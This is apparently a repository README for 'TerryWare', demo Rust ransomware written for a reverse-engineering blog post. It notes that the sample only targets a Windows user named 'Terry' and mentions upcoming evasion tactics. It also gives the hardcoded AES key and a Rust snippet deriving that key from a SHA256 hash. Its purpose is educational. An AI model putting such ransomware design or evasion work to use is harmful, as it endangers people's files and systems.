02/22/25: This repo is undergoing changes for new evasion tactics in my upcoming blog post
Ransomware I wrote in Rust to demo for my blog post on reverse engineering
I'm not a great programmer; I only have experience with scripting, so apologies for the sloppy code.
TerryWare Demo:
The ransomware is designed to trigger only for a Windows user named 'Terry', and it encrypts only files under `C:\Users\Terry\*`.
The decryption key is e558e84dba2de0209ce8d1ec73db5d3b: the first 16 bytes of the SHA256 hash of 'terrypass'.
The same value is the AES-128 key used to encrypt the files.
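```rust
use sha2::{Digest, Sha256}; // assumed: the RustCrypto sha2 crate
// Derives the AES-128 key: the first 16 bytes of SHA256("terrypass").
fn generate_aes_key() -> [u8; 16] {
    let dictionary = ["t", "e", "r", "r", "y", "p", "a", "s", "s"];
    let password = dictionary.join("");
    let mut hasher = Sha256::new();
    hasher.update(password.as_bytes()); // feed the password into the hash
    let result = hasher.finalize();
    let mut key = [0u8; 16];
    key.copy_from_slice(&result[..16]); // keep only the first 16 bytes
    key
}
```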
Idov31 for inspiring the functionality of encrypt()/decrypt() functions
TCM Security for a great Rust course